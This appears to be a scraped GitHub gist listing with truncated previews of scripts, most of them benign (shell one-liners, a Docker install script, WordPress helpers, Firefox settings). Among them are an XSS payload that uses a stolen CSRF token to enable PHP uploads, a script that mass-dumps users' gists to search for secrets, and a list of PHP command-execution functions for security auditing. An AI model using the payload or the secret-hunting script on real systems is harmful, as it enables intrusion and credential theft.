🐺
#LoneWolfLifestyle

Robert DeVore robertdevore

@nil0x42
nil0x42 / gist-massdump.py
Last active June 21, 2023 02:43
[OSINT] Dump ALL gists from a list of GitHub users
#!/usr/bin/env python3
#author: @nil0x42
# Usage:
# $ export GITHUB_TOKEN="<YOUR GITHUB TOKEN>"
# $ cat github-users.txt | ./gist-massdump.py
# $ grep -r 'someSecret' gist-massdump.out/
import sys, os, requests, json, pathlib
if sys.stdin.isatty():
@johnnypea
johnnypea / useful-one-liners.sh
Last active July 16, 2024 02:05
Useful one liners
# Run the last command as root
sudo !!
# Serve current directory tree at http://$HOSTNAME:8000/
python -m SimpleHTTPServer
# Save a file you edited in vim without the needed permissions
:w !sudo tee %
# change to the previous working directory
cd -
# Runs previous command but replacing
^foo^bar
@amriunix
amriunix / Advanced-XSS.js
Last active July 14, 2023 09:41
Some XSS payload for File Upload, leaking CSRF tokens, updating data and triggering files
function updateConfig(csrf) {
xhr = new XMLHttpRequest();
xhr.open('POST', '/application/vulnerable/to/fileUpload/settings', true);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.withCredentials = true;
configPayload = 'save=1&user=admin&allowFileUpload=php&csrf=' + csrf;
xhr.send(configPayload);
}
function getCSRF() {
@hmowais
hmowais / plugin-functions.php
Created October 28, 2019 08:06
Modify Plugin Function in Theme Functions.php
public function enqueue_scripts() {
// Empty redirect.
$redirect_fail = '';
// Set the redirect URL.
$redirectOnFail = esc_url( apply_filters( 'avwp_redirect_on_fail_link', $redirect_fail ) );
}
@nuga99
nuga99 / docker-install-parrot.sh
Last active April 29, 2024 19:18
Install Docker Engine on Parrot OS (2023)
#!/bin/sh
# From https://www.hiroom2.com/2017/09/24/parrotsec-3-8-docker-engine-en/
# Changelog:
# @DavoedM: Apr 3, 2020
# @C922A10971734: Jan 19, 2023
set -e
# Install dependencies.
@grugq
grugq / ppw
Last active July 14, 2022 05:54
passphrase generator using cmdline tools because wtf not
#!/bin/bash
#
# simplistic program that creates passphrases using bash. the passphrases
# are a Number of '-' separated words, ea. of max Chars, with limited post
# processing (upper case, lower case, 1337.)
#
# (c) 2019, thaddeus t. grugq <the.grugq@gmail.com>
#
CRACKLIB=/usr/share/dict/cracklib-small
@djrmom
djrmom / custom-hooks.php
Created October 29, 2018 21:10
facetwp conditional scroll to top only on pager
<?php
/** scroll on loaded only if pager is the change in facet **/
add_action( 'wp_head', function() { ?>
<script>
(function($) {
$(document).on('facetwp-refresh', function() {
if ( FWP.soft_refresh == true ) {
FWP.enable_scroll = true;
@matzeeable
matzeeable / is_rest.php
Last active February 22, 2024 20:20
Checks if the current request is a WP REST API request.
<?php
if ( !function_exists( 'is_rest' ) ) {
/**
* Checks if the current request is a WP REST API request.
*
* Case #1: After WP_REST_Request initialisation
* Case #2: Support "plain" permalink settings and check if `rest_route` starts with `/`
* Case #3: It can happen that WP_Rewrite is not yet initialized,
* so do this (wp-settings.php)
@mccabe615
mccabe615 / firefox_settings.md
Last active December 7, 2022 23:45
Firefox settings for testing

In about:config in Firefox, all of the below should be set to false

  • network.captive-portal-service.enabled
  • extensions.getAddons.cache.enabled
  • network.prefetch-next
  • browser.newtabpage.enabled
  • toolkit.telemetry.archive.enabled = false
  • toolkit.telemetry.enabled = false
  • toolkit.telemetry.rejected = true
@mccabe615
mccabe615 / phpdangerousfuncs.md
Last active July 17, 2024 15:30
Dangerous PHP Functions

Command Execution

exec           - Returns last line of command's output
passthru       - Passes command's output directly to the browser
system         - Passes command's output directly to the browser and returns last line
shell_exec     - Returns command's output
`` (backticks) - Same as shell_exec()
popen          - Opens read or write pipe to process of a command
proc_open      - Similar to popen() but greater degree of control
pcntl_exec     - Executes a program